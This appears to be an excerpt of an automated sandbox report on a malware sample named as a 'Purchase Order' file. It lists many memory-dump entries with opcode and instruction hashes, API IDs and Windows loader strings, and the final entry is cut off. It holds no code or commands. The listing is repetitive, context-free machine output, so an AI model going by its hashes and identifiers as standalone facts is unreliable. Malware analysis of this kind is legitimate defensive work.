                                            • API String ID: 3446177414-0
                                            APIs
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID:
                                            • API String ID: 3446177414-0
                                            APIs
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID:
                                            • API String ID: 3446177414-0
                                            Strings
                                            • System Volume Information, xrefs: 348CDEBE
                                            Similarity
                                            • API ID:
                                            • String ID: System Volume Information
                                            • API String ID: 0-764423717
                                            Strings
                                            Similarity
                                            • API ID:
                                            • String ID: CWDIllegalInDLLSearch
                                            • API String ID: 0-473384322
                                            Strings
                                            Similarity
                                            • API ID:
                                            • String ID: @
                                            • API String ID: 0-2766056989
                                            Strings
                                            Similarity
                                            • API ID:
                                            • String ID: @
                                            • API String ID: 0-2766056989
                                            Strings
                                            Similarity
                                            • API ID:
                                            • String ID: PreferredUILanguages
                                            • API String ID: 0-1884656846
                                            Strings
                                            Similarity
                                            • API ID:
                                            • String ID: verifier.dll
                                            • API String ID: 0-3265496382
                                            Strings
                                            Similarity
                                            • API ID:
                                            • String ID: LdrpInitializeProcess
                                            • API String ID: 0-2689506271
                                            Strings
                                            Similarity
                                            • API ID:
                                            • String ID: #
                                            • API String ID: 0-1885708031
                                            Strings
                                            Similarity
                                            • API ID:
                                            • String ID: Flst
                                            • API String ID: 0-2374792617
                                            Strings
                                            Similarity
                                            • API ID:
                                            • String ID: @
                                            • API String ID: 0-2766056989
                                            Strings
                                            Similarity
                                            • API ID:
                                            • String ID: Actx
                                            • API String ID: 0-89312691
                                            Strings
                                            Similarity
                                            • API ID:
                                            • String ID: LdrCreateEnclave
                                            • API String ID: 0-3262589265
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fca8790fbcbd44bd50e13cbb3c928143082da026b195c2420e8c08461a4d293f
                                            • Instruction ID: 81c7c167f83a31263c2f7a000ecde9bb8cd3e9faddf272d139cd4a8373bb6ade
                                            • Opcode Fuzzy Hash: fca8790fbcbd44bd50e13cbb3c928143082da026b195c2420e8c08461a4d293f
                                            • Instruction Fuzzy Hash: 3CC1937AE003199FEB14CF58C840BAEBBB5EF94754F54876DD815AB280E774E981CB80
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0db80cbf03d305a8a4ccc053f98d6acf20cd09e8e760826c02768a1604e10bcd
                                            • Instruction ID: c6cb222549347af13f02bcb667dd4cbdd8b91eed5ad99d2918069f0c07d7e97d
                                            • Opcode Fuzzy Hash: 0db80cbf03d305a8a4ccc053f98d6acf20cd09e8e760826c02768a1604e10bcd
                                            • Instruction Fuzzy Hash: F7C112BEA06225CFEB04CF18C590B797BA1FF48754F554359EA41AB3A1EB348941CBD0
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7c7301aacf3fcc0d3810c439e52e980696347795cbefefb60d976e2d5f99004f
                                            • Instruction ID: a3ea08ffc2fa6e0860ff4878b8decb1751a38e529184a3d5b963cf1e9d7afb79
                                            • Opcode Fuzzy Hash: 7c7301aacf3fcc0d3810c439e52e980696347795cbefefb60d976e2d5f99004f
                                            • Instruction Fuzzy Hash: 2AA13C76904219EFEB12DF68CC41FAE77B9EF45754F410258FA10AB2A0D7B99C11CBA0
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ac246e365be52c827deb6f138a6d6fdea14e4f5b4d99e6f0a6564c7e226997bc
                                            • Instruction ID: 7e6164b57bfb4044e446c86e24494fac6d025db7656b8834ce9aa8c81e9fdd1d
                                            • Opcode Fuzzy Hash: ac246e365be52c827deb6f138a6d6fdea14e4f5b4d99e6f0a6564c7e226997bc
                                            • Instruction Fuzzy Hash: 24A14479A80A05DFD715CF1CD580A1AF7F6FF88350B24866ED55A8BA60E770ED81CB80
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3b3e0c3718f1126729caeb70f6968fb1cf962fea5bd113d87139a443bce478b3
                                            • Instruction ID: 494f5c28200c3d60ca9f913beb3c6e69a5227f093dab28469f4e63d9da19c648
                                            • Opcode Fuzzy Hash: 3b3e0c3718f1126729caeb70f6968fb1cf962fea5bd113d87139a443bce478b3
                                            • Instruction Fuzzy Hash: 62B117B8B04306CFEB15CF19C580A99BBA0FB08354F64469ED8259B391DB75D983CF94
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
                                            • Instruction ID: 7bb29a76fd401942a7c9663870eb4099dcf9bf4bb5e2965765dfd25e2aeab200
                                            • Opcode Fuzzy Hash: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
                                            • Instruction Fuzzy Hash: 1F719379E0221A9FDB10CF6DC480ABEB7F9BF46790F95425AEC10AB241E774D941CB90
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                            • Instruction ID: cbf0c0258e09f60f30c84766a9523ff6863b23156fbfac222022ba71d7cd11de
                                            • Opcode Fuzzy Hash: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                            • Instruction Fuzzy Hash: BF817C76E00219CFEF14CE58C9807ADB7B2FF84348F55866ED825F7344EA35A9448B92
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5d4cfcdcd4bc260f6b64efa63e769e2264f57d1c479356a92cf96ebb043429c3
                                            • Instruction ID: 988fab030601d61170a6456b51235323aa3b46bbe82c31e5f1507fdb2d494d62
                                            • Opcode Fuzzy Hash: 5d4cfcdcd4bc260f6b64efa63e769e2264f57d1c479356a92cf96ebb043429c3
                                            • Instruction Fuzzy Hash: A1718F75A00218EFDB12DF98D880AADF7B5FF49710F504219F855AB660D734EC56CBA0
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 49473240e11b19518b448376491bd7aa4e7550756f57255bc2c903acf8ef04eb
                                            • Instruction ID: dd012af04bea0e98ebf6dfc89974f6d4265f4a6264195aeb8de6fae9dddc263f
                                            • Opcode Fuzzy Hash: 49473240e11b19518b448376491bd7aa4e7550756f57255bc2c903acf8ef04eb
                                            • Instruction Fuzzy Hash: 80814B75A00209DFDB09CF68C490AAEFBF1FF49304F1582A9D859AB351D734EA41CB90
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 88cc978ba94cf5871c196ca774109dcbc31ff79b6563a2917dae6a9af6991a34
                                            • Instruction ID: d9c563c1b1234d87103c1ef22f5fdacd9a480482d06db08c321e7956d34dfd40
                                            • Opcode Fuzzy Hash: 88cc978ba94cf5871c196ca774109dcbc31ff79b6563a2917dae6a9af6991a34
                                            • Instruction Fuzzy Hash: CE61B1B5600715EFE711CF68C840BABBBA9FF4A350F004719E8A987240DBB4E596CB91
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 184d2fa865e181734fb7750037505d509537e6e0fd00811d4195623ce08beb2b
                                            • Instruction ID: 0f723aee3d8f9f009582f731515e29efa2132fd08cee4f59e5f391e0cca497e7
                                            • Opcode Fuzzy Hash: 184d2fa865e181734fb7750037505d509537e6e0fd00811d4195623ce08beb2b
                                            • Instruction Fuzzy Hash: C761C375608741CFE701CF68C494B7AB7E4BF82718F14466CE8E58B291DBB5E886CB81
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d422902d4e08a2debf60f1392b088e6f68e8f87425b902b48cb937cea7153806
                                            • Instruction ID: 57c9d4619435996d1deeba648130218896d334958e88bccea43b0ce22b04b161
                                            • Opcode Fuzzy Hash: d422902d4e08a2debf60f1392b088e6f68e8f87425b902b48cb937cea7153806
                                            • Instruction Fuzzy Hash: 4051E6BA600706EFDB019F648C40ABB77E6EF84688F40462DF954C7250EB74C856C7E6
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b4f21957f949f025cd463f2044cd2adb15159fcd6fe8162217a9b203b4d0e000
                                            • Instruction ID: c0843610a1a0c3bde6d187be2c4757bb37f15c2ae0eed19be3d4291963dc991e
                                            • Opcode Fuzzy Hash: b4f21957f949f025cd463f2044cd2adb15159fcd6fe8162217a9b203b4d0e000
                                            • Instruction Fuzzy Hash: BA519DB1604654DFF321DF68CC80F9A7BE8EB88768F10072DE92297291DB74D841CBA5
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a3fdbf00aa8e4eb333efe3d4ab999e6824ae8a801685ad7446018b431328d925
                                            • Instruction ID: 13e622eecbe9f217fa8b6758830dbc7233a08f8e3b5ae25980a6f58001bdba9a
                                            • Opcode Fuzzy Hash: a3fdbf00aa8e4eb333efe3d4ab999e6824ae8a801685ad7446018b431328d925
                                            • Instruction Fuzzy Hash: FA410575601700DFF7168F2DD980B16BBE9EF44760F11867AE62A9B2A0DBB0DC51CB90
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 18f71bc8742543a1aa0e9462f52aa691c349221b5b6771f734dcfb27e562f0f6
                                            • Instruction ID: d7f4f6fcf5c60fbbce9f674e6613427daa2a9c5b8423c258ba68f2e60e826dc3
                                            • Opcode Fuzzy Hash: 18f71bc8742543a1aa0e9462f52aa691c349221b5b6771f734dcfb27e562f0f6
                                            • Instruction Fuzzy Hash: 3A51AE75A0030CEFEB618FB8CC80B9DBBB9EF05344F60422AE5A0A7251DBB58805DF10
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: eb4e9459b5732935e0a16f6c7bb12b727dee3c63253dd0d8b44d5ebe25fb561e
                                            • Instruction ID: 9e64d818ff6cb8a86262412ae8308e5badf15dcecd5b7eea69c09a2da752f8b2
                                            • Opcode Fuzzy Hash: eb4e9459b5732935e0a16f6c7bb12b727dee3c63253dd0d8b44d5ebe25fb561e
                                            • Instruction Fuzzy Hash: 1751BCB5105746EFE321DF28C840B26BBE8FF44764F040A5EE5A587650E778E885CBE1
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 70290d93b0742a66a0d8862f5f9428d50a971f1f9abd75fd3536582fe4e1658f
                                            • Instruction ID: 521189283d35540a78fb4b353f60202ab29d843630ce772e992a7f36717b5ac2
                                            • Opcode Fuzzy Hash: 70290d93b0742a66a0d8862f5f9428d50a971f1f9abd75fd3536582fe4e1658f
                                            • Instruction Fuzzy Hash: 505151756083469FD700CF68C880B6AB7E5FFC5358F048A2DF99497241D774E989CB52
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID:
                                            • API String ID: 3446177414-0
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 759af7da7484718429cce7f3e89ec17e8e493d8f66f8a62f4e587b70ab487789
                                            • Instruction ID: f402c4fd981bd11faf935256278baf3ffbe40e46b607038b637d5c4b525f7c6e
                                            • Opcode Fuzzy Hash: 759af7da7484718429cce7f3e89ec17e8e493d8f66f8a62f4e587b70ab487789
                                            • Instruction Fuzzy Hash: 3231C17AA01204EFEB12CE98C880B5A73E9DF84758F158A2AED159B201D774FD40CB90
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 19d5a70304ee264194e59b541f0c8be5a5151ebb0e021756d8f98207dba5fac5
                                            • Instruction ID: e64745342c7e8074bc7cc5c11a0eac2e88d3ca4f33614884c984c8900ab915e9
                                            • Opcode Fuzzy Hash: 19d5a70304ee264194e59b541f0c8be5a5151ebb0e021756d8f98207dba5fac5
                                            • Instruction Fuzzy Hash: EE31F571A00619EFEB019F68CC41ABFB7F9EF44700B4402A9F801EB260E7749A51CBA0
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: c2c474a0826b8debdfd8e81abaef4d3501acf7eee59ded7ab5e060ada88137bd
                                            • Instruction ID: ff7501eb0c2d8d841d5034b7703f5e53354e6bc47b90ddcb61b3fa0848536e27
                                            • Opcode Fuzzy Hash: c2c474a0826b8debdfd8e81abaef4d3501acf7eee59ded7ab5e060ada88137bd
                                            • Instruction Fuzzy Hash: C2216672502A00DFE722DF2CC940F19B7B5FF08B48F144A6DE126976A1C779A812DB84
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 343514f898bd017ba1586ecb2ea19993cdb7210fcbc1a65b1a11090308070b1a
                                            • Instruction ID: 571a5ccf3151e83f3e5ee084531d804ef7ce75cd22c28d2240da58c52dc242c9
                                            • Opcode Fuzzy Hash: 343514f898bd017ba1586ecb2ea19993cdb7210fcbc1a65b1a11090308070b1a
                                            • Instruction Fuzzy Hash: D5117CB6640F12AFE7114E699840711F774BF433A9F01072AEE20976E0CBE5E9A1CAD0
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9d9ff43705e81bc9b65f0d406728b715663a060748b93d81868dfe7aca292d70
                                            • Instruction ID: 17de1da0cb26406a2f1e0647ad2f8e0594ce5554883751d392fbcafc9ca9ccd7
                                            • Opcode Fuzzy Hash: 9d9ff43705e81bc9b65f0d406728b715663a060748b93d81868dfe7aca292d70
                                            • Instruction Fuzzy Hash: 7B21A4B9A012098FFB01CF6DC4547EEB7A4FB88718F65822CD852572D0CBB89985C754
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID:
                                            • API String ID: 3446177414-0
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 68db92b6fde72f75dd3ca5c6622dea57c9a32982e778184a89aaaa1dabb979ca
                                            • Instruction ID: 5261f7af2b29465789b892324f52c27c58ef7e40c3ff43bd1bcad6bc2a123b9f
                                            • Opcode Fuzzy Hash: 68db92b6fde72f75dd3ca5c6622dea57c9a32982e778184a89aaaa1dabb979ca
